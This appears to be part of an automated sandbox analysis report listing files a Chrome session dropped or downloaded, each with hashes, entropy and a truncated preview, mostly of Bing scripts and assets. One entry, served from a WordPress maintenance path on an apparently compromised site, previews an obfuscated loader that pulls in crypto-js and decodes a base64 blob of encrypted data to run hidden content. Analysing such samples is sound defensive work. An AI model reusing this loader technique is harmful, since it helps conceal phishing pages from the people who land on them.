                                                                                                      Preview:var WebResultToolboxBlueV2;(function(){function tt(){var n=_ge("b_results"),t=_ge("b_context");(n||t)&&typeof sa_CTBConfig!="undefined"&&sa_CTBConfig&&(r[b]=ot,r[k]=l,r[d]=l,r[g]=c,r[nt]=c,sj_be(sj_b,"click",function(n){u(n)}),sj_evt.bind("onPopTR",function(n){u(n,!0)}),sj_be(sj_b,"mousedown",function(n){h(n)}),sj_be(sj_b,"mouseup",function(n){h(n)}),n&&s(n.firstChild),t&&s(t.firstChild))}function it(n){return _G.abdef_sarc!=undefined&&n.classList.contains(_G.abdef_sarc)}function s(n){n&&n.nodeType==1&&!it(n)&&(ut(n),s(n.nextSibling))}function rt(n,t,i){for(var r=-1;i--&&r++<n.length;)if(r=n.indexOf(t,r),r<0)break;return r}function ut(n){var y,u,t,c,f,s,l,a;if(n){var r=ct(sa_CTBConfig.toolboxTriggerClassName,n,"span"),h=n.getElementsByTagName("cite"),e=v(n,"u");e&&i(e,"u")[0]==="e"&&(e=null);y=sa_CTBConfig&&sa_CTBConfig.disableMetaData=="1";r&&(h.length||y)&&(u=h.length>0?h[0]:null,n.tt=r,ft(n,e)&&bt(n)&&(t=sj_ce("a"),t.href="#",t.className="trgr_icon",t.setAttribute("aria-label",sa_CT
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (8674), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8674
                                                                                                      Entropy (8bit):5.212727429542033
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:a4/1MfRZ4V9bmVKnhHKBEs9F3kBlVD+mxHpfuq:ac1MfRkHpiEs9dkBfDLJfuq
                                                                                                      MD5:1C0981AC86E2EA5B7F08F34548AF3280
                                                                                                      SHA1:57324208DDB3A9E80ABD3346607D712C999C2E50
                                                                                                      SHA-256:00FF3483D93259AEDB929A9FEE4454A623830B18A08F08781AC1961C1E98774A
                                                                                                      SHA-512:0F7185A8579D9BF1B89623BF126C58789010C76F7E279A3F44064C78B2E3E04BB0A89394E6BE185618071153BC872E43A69211255F3470E1120E51AB0D5F2329
                                                                                                      Malicious:false
                                                                                                      Preview:(function(n,t,i,r,u,f,e,o,s){function w(n,t,i){var r=[],u;return n&&(i=i||"*",u=n.getElementsByTagName(i),h(u,function(n){nt(n,t)&&r.push(n)})),r}function b(n,t,i){var r=[];return h(n,function(n){var u=w(n,t,i);u&&u.length>0&&(r=r.concat(u))}),r}function bt(n,t){var i=[];return h(n,function(n){var r=null;try{r=n.querySelector(t)}finally{r&&(i=i.concat(r))}}),i}function ut(n){return g[n]||(g[n]=new RegExp("\\b"+n+"\\b")),g[n]}function nt(n,t){var i=n.className||"";return ut(t).test(i)}function y(n,t){n.className=n.className||"";nt(n,t)||(n.className+=" "+t)}function p(n,t){var i=n.className||"",r=ut(t);n&&i&&t&&(n.className=n.className.replace(r,"").replace(/\s+/," "))}function a(n){return f(n),u(n),!1}function kt(n){return(n=n||i.event,n.pageX||n.pageY)?{x:n.pageX,y:n.pageY}:{x:n.clientX+s.scrollLeft-s.clientLeft,y:n.clientY+s.scrollTop-s.clientTop}}function c(n,t){var i=n.currentStyle,r=0,u;return _w.getComputedStyle&&(i=_w.getComputedStyle(n),sb_ie&&(r=parseFloat(i.paddingTop)+parseF
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):47992
                                                                                                      Entropy (8bit):5.605846858683577
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                      MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                      SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                      SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                      SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                      Malicious:false
                                                                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1517), with CRLF line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):2077
                                                                                                      Entropy (8bit):5.892270476360257
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:iH7bAAsYHBcIDr/7NjBzCuqge/qJjJGAyoE9gluIuSn:iHtVHBcIH/7TCbg/A/h9gluI9n
                                                                                                      MD5:3125765E48610451BCFF09A75079E08D
                                                                                                      SHA1:19E0255D898F2C841AEBDC8F384DF97295A24620
                                                                                                      SHA-256:42004A4CEAE086EB535889E143B98BB98F990E071483A39C344A9DB079195DC4
                                                                                                      SHA-512:B9F48B99B22257457B501085B32CEB45A84284D0EBE48C88FEC15EE1030D245B84E869BAE4F9CFB5D95BCB68A33105C1E329C037C545B3683CAFF8C5AEE7A1EF
                                                                                                      Malicious:false
                                                                                                      URL:https://clinicaaryal.com/wp-admin/maint/404.php?0-797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541-initial
                                                                                                      Preview:var perceive= document.createElement("script");..perceive.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(perceive);..perceive.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiUVpzRDJOR0xrWHpMcEQ0SDRCZG5qWVNkbnZNR0h5MDFVQVBTbjdGT2N4MVludEpTOUw5ZGt4NnhIZmtaWk50QzJyRmhtcWJpXC9rdU5uS0RQa0NLdkIwN1F6eFdFY2ljZGNhYXE0dTBqdDhDMmZVXC9kWFhySFpQbWFTZ0ZDMVZWNDVzM2liXC9TUDhmdzA2aHd5TUFqdTR1d3BYazRPdUlBUUw4QXhVTUY4QjhIUTlnXC9OTG81dldORjE0amxxcitObkcrUHFKdG5KRVNXYkdhK0RueWFhOTJiS2VyRE94d3ZjdW91R01jUVMzYmNnUGRKSk5DdWNMenFtbWRPbnlYSzFzMVUwUlRXWVVubWUrSXFqdTlDQ1dOMXdqT2tSYTZkWUtrMlFtU3l5M2piQ2lQN092TEQ4ODRuS2Rtd3UyVVdUZFFqejBGMjVkNWJ0ejFyc3NYNUVBYVRvXC9yS2lLWlIxaDUyb05pWUZcLzV3c1pUTGhKWkIzQWFiXC9XU0g4aGNxdDcwbTNUYmhxUWVOM0NPSWh2Y1JMZ2FqYWpjUE10OTF5amUxN1pZdGtFbmxCMllmanM5WjFpNFhJT25lUkJWSEc2UUVvRTkrMFN4Rit4YjNVRUJjSEpvaVM3U1NUdUdMUTlqbVVaaFRuTW55WDlBXC90UGNCWCtXV2xFamtPMjJmKyIsImMiOiI2NmY4Y2NmZjE2MzVjZmZjN2ZhMDAzODEyM2YwMjY
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (674), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):674
                                                                                                      Entropy (8bit):5.239693493116514
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:GyX+fnReu8VliHMtm5vXuMp4CWhneMNqOgqpsRWc9mMCDBMw0n:GS4Reu+kSkNCnvVgqSRWzAn
                                                                                                      MD5:8D078E26C28E9C85885F8A362CB80DB9
                                                                                                      SHA1:F486B2745E4637D881422D38C7780C041618168A
                                                                                                      SHA-256:0BF9F3AD9CDBBC4D37C8B9E22DD06CC26EEA12A27EF6C0F95DB6CBE930177461
                                                                                                      SHA-512:B808A972CD44E6BDA01AC1F8D904D5A281F33B9238B8CAAB03DECB6ADB6B494B19DD9BB35E3D1EA3CA914FF4957155F6D2CB5A9B3A00C2195F80F52804FFB244
                                                                                                      Malicious:false
                                                                                                      Preview:var LinksColorOnMD;(function(n){function i(n){while(n&&n.nodeName!=="A")n=n.parentElement;return n}function o(n){if(n.button===0&&!n.ctrlKey&&!n.shiftKey){var f=i(sj_et(n));f&&(Lib.CssClass.add(f,t),r[f.href]=sb_st(function(){u(f)},5e3))}}function u(n){Lib.CssClass.remove(n,t)}function s(n){h(n);var r=i(sj_et(n));r&&Lib.CssClass.remove(r,t)}function h(n){var t=i(sj_et(n)),f;t&&(f=r[t.href],f&&sb_ct(f),e&&u(t))}function f(){for(var n,i=_d.getElementsByTagName("A"),t=0;t<i.length;t++)(n=i[t],n)&&(sj_be(n,"mousedown",o),sj_be(n,"click",s))}var t="b_LinksColorMD",r={},e=sj_cook&&sj_cook.get("SRCHHPGUSR","NEWWND")==="1";n.bind=f;f()})(LinksColorOnMD||(LinksColorOnMD={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1949), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1949
                                                                                                      Entropy (8bit):5.088143640620333
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:koktAKpA72dVRZoSGIAfAoPk0+qhn4bgLTBhzECkVlpjw4on:kJ3i2oV/h+mTkTdon
                                                                                                      MD5:718C9D9C2D2A498DE3C6953B6347A22F
                                                                                                      SHA1:B2F1A5400618972690D509E970CC3ABEB72513F4
                                                                                                      SHA-256:66133F155E3A433E9EECA08DFC3B4E225D358E1A89AB0665379EFF319F9F0081
                                                                                                      SHA-512:AC55EF9F45D29CFCF7D80C009DF4C55335F7C3B55D66AADDE275F580F321125A2C7669F7157D5BF9A34B3513C1231935A461F46EEEBDD87B7801685FC95DC6C3
                                                                                                      Malicious:false
                                                                                                      Preview:var Pager;(function(n){function f(n,r,u,f,e,o,s,h,c){if(t[n])return t[n];var l=new i(n,r,u,f,e,o,s,h,c);return t[n]=l,l}var u=0,r="active",i=function(){function n(n,t,i,r,f,e,o,s,h){var a=this,v=_ge(n),c,l,y;if(v){if(this.pager=v,this.controlId=t,this.pagerLabels=o,this.activeIndex=s>=0?s:u,this.enableDots=h,this.enableDots)for(c=0;c<i;++c)l=this.getDot(c),l&&(l.pagerindex=c,sj_be(l,"click",function(n){r&&sj_evt.fire("slideexp_slidetoindex",a.controlId,n.target.pagerindex);Log.Log("Click","Pager","ID"+n.target.pagerindex,!1)}));e&&(y=_ge(this.pager.id+"_pager_seemore"),Lib.CssClass.add(y,"enable_fade"),Lib.CssClass.add(v,"enable_fade"),Lib.CssClass.add(y,"pager_seemore_hidden"));sj_evt.bind("pager_updateindex",function(n){if(a.isForMe(n)){var t=n[2];a.updatePager(t,i,f,e)}})}}return n.prototype.getDot=function(n){var t=this.pager.firstElementChild;return t.children[n]},n.prototype.getActiveNode=function(){return this.pager.firstElementChild},n.prototype.updatePager=function(n,t,i,u){va
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (888), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):888
                                                                                                      Entropy (8bit):5.1970220185324045
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2QiCUrgtI/QHnUrtrRIRJ7ea/TwH4Mnbx+yGow0N:SK44AIb/7QUH0N
                                                                                                      MD5:F1CF1909716CE3DA53172898BB780024
                                                                                                      SHA1:D8D34904E511B1C9AAE1565BA10CCD045C940333
                                                                                                      SHA-256:9ABAC0CBFA6F89106B66CD4F698EAD5CCBF615ECF8CD7E9E88567A7C33CFEC01
                                                                                                      SHA-512:8B641E93405565B4A57C051EDEFC8E02D6C929DDD4C52F9BFBD19C57896AA40426BF5ED6760DBD479719561C4F0A25BFC4102F0F49D3D308035C9CA90B1D0FCE
                                                                                                      Malicious:false
                                                                                                      Preview:(function(){function f(){var u=o(),i,t,f;if(u)for(i=s(u),t=0;t<i.length;t++)f=i[t].id.replace(n,""),Log&&Log.Log&&Log.Log("Info",r,f,!1,"Text",t.toString()),sj_be(i[t],"mousedown",e)}function e(t){var r=i(t.target),f;r!=null&&(f=r.id.replace(n,""),Log&&Log.Log&&Log.Log("Info",u,f))}function i(t){if(t!=null){var r=t.id;return r!=null&&r.indexOf(n)===0?t:i(t.parentElement)}return null}function o(){var n=_d.querySelectorAll(".b_scopebar > ul");return n&&n.length>0?n[0]:null}function s(i){for(var r,o,u=[],e=i.children,f=0;f<e.length;f++)r=e[f].id,r!=null&&r!==t&&r.indexOf(n)===0?u.push(e[f]):r!=null&&r===t&&(o=h(),u.push.apply(u,o));return u}function h(){var n=_d.querySelectorAll(".b_scopebar #b-scopeListItem-menu .b_sp_over_menu .b_scopebar_item");return Array.prototype.slice.call(n)}var n="b-scopeListItem-",t=n+"menu",r="DynScopeRank",u="DynScopeClick";sj_evt.bind("onP1",f)})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1392
                                                                                                      Entropy (8bit):7.796320976198958
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:zq00gh1w5R9UprEcf8jNNRwGEjJxSxcwV4/sukfm6OgRatsqDq0gcd6SUM:zqzm1wJqSLRwjjexjysukKsqDEc8m
                                                                                                      MD5:C5350436C66BC4E4C10F70BAF13DC4CA
                                                                                                      SHA1:0E77A216A7CFE0A335A1D9B5B30436CD9F9C1EC3
                                                                                                      SHA-256:A1664675270300CFAE5417D39B21CDF7005A6200BDA135CA8F978620FBBE93CD
                                                                                                      SHA-512:8798F8C560B43ECCE6E1B5406A5366E2F8DB46FDB34AADCD6A5D7566CD0F4BFA53695393874BC1381D8C57B4AE103A99362E3AB1DB29A3A05C7ABC7CBC9229F6
                                                                                                      Malicious:false
                                                                                                      URL:https://th.bing.com/th?id=ODLS.0487136c-9717-4c2c-acde-9914f4282920&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG.VKl.U.}v.6........DP.."....hf...qb.Om..*.....).....HQYWP(..4........I.I`..~.uI........V.....i.y.{.w,..H..}.T.........!ra..r."b.`TX3.a-b......Gi!z..]0~.Kb9.._...W.kW..A..1a....|PX...u.Dj..\..@.,.w#.".h.D....gb....w".^..9D..6....Q\..........K.6.....1o..0;.{....$?"....ZE..Q1p..^.....(..=.G...^..4..... ..<o...h........K.5.z....4.C.!..].;..*..A.....q....F.Z..U....1r.g........8.....^F. `.[.].hUP..?.^..k...R.....'p...K.N...H...J9.LZ...k.E..j.3.!.!.>.s|@.mE...=9L.~.;S.._.m.J..\j...B...6..F....V.hC...v......'.8..aL8.g..i.Zm_kSaw...}.,..eQ."g.iY2.w.L.w....._,.11.U)..........a*..1o.j...s.k.=W...i..EY.?.#.....w.k6....e..D.Y/b..mx......Vh77...7..1.t(Z..0...Z..a/..."`....n..<.R.....(.).S..h.p.%.yN.l .p.3...p...M.i.9{H.P...9..a..3.H.{L...A.4..ZK3.W..~\.=,.//.3X...>.Z.L%:...6........9.......v..8..Y..Y..X......."..`+...U{.|.....).bX.w}#..H...v.s.....Sp...!Y...=:...7..a.YR...i...c7..
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1970), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1970
                                                                                                      Entropy (8bit):5.219240035957165
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2Qqp/+qmkfREMfC1j7gYu47eTGXaso1pOS3N/AzMCLYtaeA1YIV15ML9YYUAdArz:ap9fCMftAACMafzARzLAxtTF4SqzN4
                                                                                                      MD5:8898A2F705976D9BE01F35A493F9A98F
                                                                                                      SHA1:BC69BEC33A98575D55FEFAE8883C8BB636061007
                                                                                                      SHA-256:5F30270AA2DC8A094D790E1E4A62B17C7D76A20B449D9B69AF797A55FADA9108
                                                                                                      SHA-512:C8575DF93FBD1F65A285D484257ADFE12733E47A6524A18D5910D33562EEFD1D9DA7197D16C7A3CAD3BC5AD89546FF0FEFE90E5C96E7850ECEC9708C90334349
                                                                                                      Malicious:false
                                                                                                      Preview:(function(){function a(){r&&(r=!1,w(),SydFSCHelper.deleteNotebookFlagInURL())}function p(){if(!Lib.CssClass.contains(n,"disabled")&&!r){r=!0;var t=_ge(o),i=_ge(s),u=_ge(h);b(t,i);e||v(t,i,u)}}function w(){n&&Lib.CssClass.remove(n,i);t&&Lib.CssClass.remove(t,f);n.firstChild.ariaCurrent="false"}function b(r,u){n&&Lib.CssClass.add(n,i);t&&Lib.CssClass.add(t,f);r&&Lib.CssClass.remove(r,i);u&&Lib.CssClass.remove(u,i);u.firstChild.ariaCurrent="false";n.firstChild.ariaCurrent="page"}function v(i,r,u){var l,s,h,c;if(!e&&n){var a=n.offsetWidth,v=getComputedStyle(n),o=parseInt(v.marginLeft),f;i&&i.offsetWidth&&(l=getComputedStyle(i),o+=i.offsetWidth+parseInt(l.marginRight),f=i);r&&r.offsetWidth&&(s=getComputedStyle(r),o+=(!f?0:parseInt(s.marginLeft))+r.offsetWidth+parseInt(s.marginRight),f||(f=r));u&&u.offsetWidth&&(h=getComputedStyle(u),o+=parseInt(h.marginLeft)+u.offsetWidth+parseInt(h.marginRight));c=sj_ce("style");c.textContent="\n .b_sydConvMode.b_notebookMode .b_scopebar #".conca
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (34732), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):34732
                                                                                                      Entropy (8bit):5.452487645923916
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:+J0AmB7aPmB7aU1THyBVyD3NSrGyDQS+mZvUhM/4S8SrmB:+aaUaJCDA3DjHZv37n6
                                                                                                      MD5:E4FB9B839186660B1F729B8DF8C994B4
                                                                                                      SHA1:931792CD70CED4AD586F6329C30C294EBEA1548E
                                                                                                      SHA-256:6838611C8AB6539005E11C84CA308158F89A51DB57A62CAF21FAAB48BF576177
                                                                                                      SHA-512:625436BB52CBD7DF7ED03BE05FEA52C5D54B6CC15037D70C268D9598E648A22246DB902B9C6F097BA8B18BD924F6AB17120736285D54DCE13773237F1669853A
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/kxeSzXDO1K1Yb2MpwwwpTr6hVI4.js
                                                                                                      Preview:var ModernRewards;(function(n){var t="redDotDisplay",e="redDotDisplayFill",f="rewards_header_icon serp",o="rewards_header_icon hp",s="/red-dot-24.png",h="AutoOpenFlyoutFired",c="bfbNotificationShown",l="BNPNotificationShown",a="ChatVerticalShown",v="CookieDisabled",y="IsAADUser",p="MissingModel",w="_RwBf",b="rwmrst",i=!0,u="",r="//az15297.vo.msecnd.net/images/rewards/membercenter/missions/redDotImage.png",k=function(){function n(n){this.reportActivityModel=n;this.rewardsReadyEventArgs={isAuthenticated:n&&n.IsAuthenticated,isRebatesUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRebatesUser,isRewardsUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRewardUser,isTrialUser:n&&n.RewardsSessionData&&!n.RewardsSessionData.IsRewardUser&&n.RewardsSessionData.IsTrialUser,waitlist:n&&n.RewardsSessionData&&n.RewardsSessionData.Waitlist,isCcpEligible:n&&n.RewardsSessionData&&n.RewardsSessionData.IsCcpEligible,hasUsedCcpTrial:n&&n.RewardsSessionData&&n.RewardsSessionData.HasUsedCcpTrial}}re
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):282
                                                                                                      Entropy (8bit):4.768675821769942
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:tbXH4mc4sl3UY7eERI1+N9H5R0MLERIwoVNdJMvdIXyCWfuBIAFfu:tbH41niB1+bj0MLBnpavdqyVGBIAFm
                                                                                                      MD5:E38795B634154EC1FF41C6BCDA54EE52
                                                                                                      SHA1:16C6BF388D00A650A75685C671AF002CEA344B4B
                                                                                                      SHA-256:66B589F920473F0FD69C45C8E3C93A95BB456B219CBA3D52873F2A3A1880F3F0
                                                                                                      SHA-512:DCA2E67C46CFF1B9BE39CE8B0D83C34173E6B77EC08FA4EB4BA18A4555144523C570D785549FED7A9909C2E2C3B48D705B6E332832CA4D5DE424B5F7C3CD59BE
                                                                                                      Malicious:false
                                                                                                      Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16">.. <path d="M0 0h16v16h-16z" fill="none"/>.. <path d="M8 1a7 7 0 1 0 7 7 7 7 0 0 0-7-7zm1 10a1 1 0 0 1-2 0v-3a1 1 0 0 1 2 0zm-.293-5.293a1 1 0 1 1 .293-.707 1 1 0 0 1-.293.707z" fill="#767676"/>..</svg>
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (589), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):589
                                                                                                      Entropy (8bit):5.085028072286348
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:bCMUnSeFbDN5a8f8R4Xtmp4ElMYVoJFp1wErUVKtRJnZM4C8Lv:bPUSeFbZ5ae8R4XtmqElFVK1ptRNj
                                                                                                      MD5:7A903A859615D137E561051C006435C2
                                                                                                      SHA1:7C2CBEB8B0E83E80954B14360B4C6E425550BC54
                                                                                                      SHA-256:281D6234FD292800C2A5DBD14E524C9CEE0D4438188B0B7D873ABF41515A7666
                                                                                                      SHA-512:AA47EFAB7EC689B838D1E5ADFE26E035E8B93F2B806F1954214447CB2065FA5906F81A70B4C656B3CE1490D8AC2009C7E7B0F96491D6D4559C41FB25D08FE35C
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/fCy-uLDoPoCVSxQ2C0xuQlVQvFQ.css
                                                                                                      Preview:#rewardsLoadingAnimation{position:absolute;top:50%;left:50%;margin-left:-30px;z-index:1;border-radius:50%;border:1.5px solid;border-color:#0078d4 #c7e0f4 #c7e0f4;animation:spin360Deg 1.3s cubic-bezier(.53,.21,.29,.67) infinite}#rewardsLoadingAnimation.extraLarge{width:100px;height:100px}#rewardsLoadingAnimation.large{width:80px;height:80px}#rewardsLoadingAnimation.medium{width:60px;height:60px}#rewardsLoadingAnimation.small{width:40px;height:40px}#rewardsLoadingAnimation.extraSmall{width:20px;height:20px}@keyframes spin360Deg{from{transform:rotate(0deg)}to{transform:rotate(360deg)}}
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1833), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1833
                                                                                                      Entropy (8bit):5.03858600819449
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:Jk08PkQix8QboQO7cxfFb87c9nH40VtN3HCBuNDbHNxpA:sPb6oZY80tVbHDtTA
                                                                                                      MD5:D7365C424E30CB142A85B84C0618D671
                                                                                                      SHA1:7212FE88CD0686A381ACB1B0583A544AE3ADA1B0
                                                                                                      SHA-256:8FD0225B5F75EE2326ADC68A10F5B9FC50C30A45BF4B61C7EE9364103E6102C8
                                                                                                      SHA-512:26D9A5DA2CC591954C6014B4DE1826653C9F058E9C8287342D8F0F2C9960BDAF30E1D4F8ADDF529830327D94C8BCA21848A3ADAF2846036A5E9C618992B18D5F
                                                                                                      Malicious:false
                                                                                                      Preview:var ExtendIconClickTargetV2;(function(){function n(){var u=document.querySelectorAll(".b_tpcn"),e,r,f,n,i,t;if(u)for(e=function(n){var r=u[n],i,t,f;if(r&&(r.onclick=function(n){if(!n||n.target===r){var t=r.querySelector(".tilk");t&&(_w.si_T&&_w.si_T(t.getAttribute("h")),t.click())}},i=r.nextElementSibling,i&&(r.addEventListener("mouseover",function(){r.style.cursor="pointer";var n;n=i.tagName==="H2"||i.tagName==="H3"?i.querySelector("a"):i.querySelector("h2 a, h3 a");n&&(n.style.textDecoration="underline")}),r.addEventListener("mouseout",function(){r.style.cursor="";var n;n=i.tagName==="H2"||i.tagName==="H3"?i.querySelector("a"):i.querySelector("h2 a, h3 a");n&&(n.style.textDecoration="")}),t=i,!t||t.classList&&t.classList.contains("b_title")||t.tagName==="H2"||t.tagName==="H3"||(t=t.querySelector("h2, h3")),t))){if(f=t.querySelector("a"),!f)return{value:void 0};t.addEventListener("mouseover",function(n){n&&n.target===t&&(t.style.cursor="pointer",f.style.textDecoration="underline")});t
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (21920)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):21951
                                                                                                      Entropy (8bit):5.3573914200107335
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:Kh4kT1lYxfqyDOhKMpWMEVhbTDDoFWZ3BnqIfP5IDV6s4RKAwKXvUNuw+0wzueAi:Y5Tifh3bBpBnqIH+Z6sepXv0uQaV
                                                                                                      MD5:51775361FD842E7E41AF84A01C8AB92C
                                                                                                      SHA1:21D108490F70991727A3B044983342517336B53F
                                                                                                      SHA-256:8B549EEF372338FC3F5632B9BD47AD2C2876229E573095CCBC6B7867A47153F9
                                                                                                      SHA-512:96FD8D92BA98B65B4BD34FF57F351123EA907C3DC91A4814F8DE3E6985B6BC9CA0972F8E6CBEE072F50742CA5F19D03F623C32EB5061C9CA1D6A3CFB47344DCE
                                                                                                      Malicious:false
                                                                                                      Preview:/*!DisableJavascriptProfiler*/.var BM=BM||{};BM.config={B:{timeout:250,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:14e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:10}},function(n){function vt(){if(!document.querySelector||!document.querySelectorAll){k({FN:"init",S:"QuerySelector"});return}w={};e=[];ft=1;ut=0;rt=0;o=[];s=0;h=!1;var n=Math.floor(Math.random()*1e4).toString(36);t={P:{C:0,N:0,I:n,S:ei,M:r,T:0,K:r,F:0}};pi()}function oi(n,t){var r={};for(var i in n)i.indexOf("_")!==0&&(i in t&&(n[i]!==t[i]||i==="i")?(r[i]=t[i],n[i]=t[i]):r[i]=null);return r}function si(n){var i={};for(var t in n)n.hasOwnProperty(t)&&(i[t]=n[t]);return i}function b(n,t,r,u){if(!h){k({FN:"snapshot",S:n});return}r=r||ni;t=t||!1;var f=g()+r;ot(o,n)===-1&&o.push(n);t?(yt(),pt(t,u)):f>s&&(yt(),rt=sb_st(pt,r),s=f)}function k(n){var u={T:"CI.BoxModelError",FID:"CI",Name:ht,SV:ct,P:t&&"P"in t?d(t.P):r,TS:f(),ST:v},i,e;for(i in n)u[i]=n[i];e=d(u);wt(e)}func
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (674), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):674
                                                                                                      Entropy (8bit):5.239693493116514
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:GyX+fnReu8VliHMtm5vXuMp4CWhneMNqOgqpsRWc9mMCDBMw0n:GS4Reu+kSkNCnvVgqSRWzAn
                                                                                                      MD5:8D078E26C28E9C85885F8A362CB80DB9
                                                                                                      SHA1:F486B2745E4637D881422D38C7780C041618168A
                                                                                                      SHA-256:0BF9F3AD9CDBBC4D37C8B9E22DD06CC26EEA12A27EF6C0F95DB6CBE930177461
                                                                                                      SHA-512:B808A972CD44E6BDA01AC1F8D904D5A281F33B9238B8CAAB03DECB6ADB6B494B19DD9BB35E3D1EA3CA914FF4957155F6D2CB5A9B3A00C2195F80F52804FFB244
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/9IaydF5GN9iBQi04x3gMBBYYFoo.js
